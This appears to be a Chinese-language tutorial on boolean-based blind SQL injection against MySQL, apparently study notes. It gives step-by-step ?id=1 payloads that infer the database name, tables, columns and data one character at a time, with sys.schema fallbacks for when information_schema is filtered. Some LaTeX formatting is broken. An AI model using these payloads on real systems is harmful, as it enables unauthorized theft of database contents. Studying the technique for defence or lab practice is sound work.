常用函数
-
substr(str,from,length)
返回从下标为from截取长度为length的str子串。其中,首字符下标为1
-
length(str)
返回字符串长度
-
ASCII(char)
返回char的ascii码,常与substr一起使用
注入步骤
输入id以查询 查询成功返回
s
u
c
c
e
s
s
\color{#00FF00}{success}
success 失败返回
e
r
r
o
r
\color{#FF0000}{error}
error
1. 爆数据库名称长度
?id=1 and length(database())=i
#i 为猜测长度
2.爆库名
?id=1 and substr(database(),j,1)=‘a’
...
?id=1 and substr(database(),j,1)=‘z’
#猜出每位字母后 j 每次步长1向后移动直到数据库长度 i
3.确定当前库中表的个数
?id=1 and (select COUNT(*) from information_schema.tables where table_schema=database())=k
#k 为表张数,共k张表
当information_schema被过滤时使用sys.schema
- 在mysql 5.7中新增了sys.schema,基础数据来自于performance_chema和information_schema两个库,本身数据库不存储数据
?id=1 and (select COUNT(*) from sys.schema_auto_increment_columns where table_schema=database())=k
#或者
?id=1 and (select COUNT(*) from sys.schema_table_statistics_with_buffer where table_schema=database())=k
4.爆表名长度
?id=1 and (select length(table_name)from information_schema.tables where table_schema=database() limit 0,1)=m
#表名长度为m
#取出从第0个开始的一张表
-
limit使用
limit a,b 从a开始的b项,共b项
5.爆表名
?id=1 and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)=‘a’
...
?id=1 and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),m,1)=‘z’
其他表同理
6.爆表项个数
?id=1 and (select COUNT(*) from information_schema.columns where table_schema=database() and table_name='table_name')=n
#共n项
7.爆表项长度
?id=1 and (select length(column_name) from information_schema.columns where table_name='table_name')=v
#表项为v
8.爆表项
?id=1 and substr((select column_name from information_schema.columns where table_name='table_name' limit 0,1),1,1)='a'
...
?id=1 and substr((select column_name from information_schema.columns where table_name='table_name' limit 0,1),1,1)='z'
9.爆数据
?id=1 and substr((select column_name from table_name),1,1)='a'
...
?id=1 and substr((select column_name from table_name),1,1)='z'